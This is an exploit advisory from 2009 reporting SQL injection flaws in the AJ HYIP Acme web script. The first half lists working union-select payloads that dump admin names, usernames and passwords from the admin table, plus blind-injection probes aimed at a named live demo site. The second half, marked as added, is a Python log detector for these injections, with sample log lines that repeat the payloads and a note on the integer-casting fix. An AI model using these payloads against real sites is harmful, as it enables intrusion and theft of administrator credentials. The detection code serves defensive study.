/*

AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities

Discovered by : MizoZ
Contact : mizozx@gmail.com

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

SQL Injection news.php (GET : id) :
[HOST]/[PATH]/news.php?id=[SQL CODE]

SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--

-----------------------------

SQL Injection topic_detail.php (GET : id) :
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL CODE]

SQL CODE :
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--

ONLY IN ACME EXTENSION

-----------------------------

Blind SQL Injection readarticle.php (GET : artid)

http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1-- ==>> TRUE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0-- ==>> FALSE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5-- ==>> TRUE
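
-----------------------------

Detection (added example, not part of the original advisory): all three parameters above (id on news.php and topic_detail.php, artid on readarticle.php) are expected to be plain integers, so any other value in a web access log is worth triage. The sketch below assumes combined-format log lines; the function name, labels and sample lines are constructed for illustration.

```python
# Added example (not from the advisory): flag requests to the three affected
# scripts whose numeric parameter carries anything other than digits.
import re
from urllib.parse import urlsplit, parse_qs

# script name -> parameter the advisory reports as injectable
AFFECTED = {"news.php": "id", "topic_detail.php": "id", "readarticle.php": "artid"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)
BOOLEAN_RE = re.compile(r"\b(?:and|or)\b.+[=<>]", re.I | re.S)


def classify(log_line):
    """Return None for benign/irrelevant lines, else a short finding label."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = AFFECTED.get(script)
    if param is None:
        return None
    # parse_qs URL-decodes and turns '+' into a space, like PHP's $_GET
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if value.isascii() and value.isdigit():
            continue
        if UNION_RE.search(value):
            return f"{script}:{param} union-select"
        if BOOLEAN_RE.search(value):
            return f"{script}:{param} boolean-test"
        return f"{script}:{param} non-numeric"
    return None


# Constructed sample access-log lines (combined log format, documentation IPs)
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Jul/2009:10:00:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jul/2009:10:00:05 +0000] "GET /news.php?id=null+union+select+1,2,3,4,5+from+admin-- HTTP/1.1" 200 5301',
    '198.51.100.7 - - [29/Jul/2009:10:00:09 +0000] "GET /article/readarticle.php?artid=3+and+1=0-- HTTP/1.1" 200 2100',
    '198.51.100.7 - - [29/Jul/2009:10:00:12 +0000] "GET /forum/topic_detail.php?id=7%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line.split('"')[1])
```

A hit only shows that a non-integer value reached the script; the fix on the application side is to cast these parameters to integers or bind them in prepared statements.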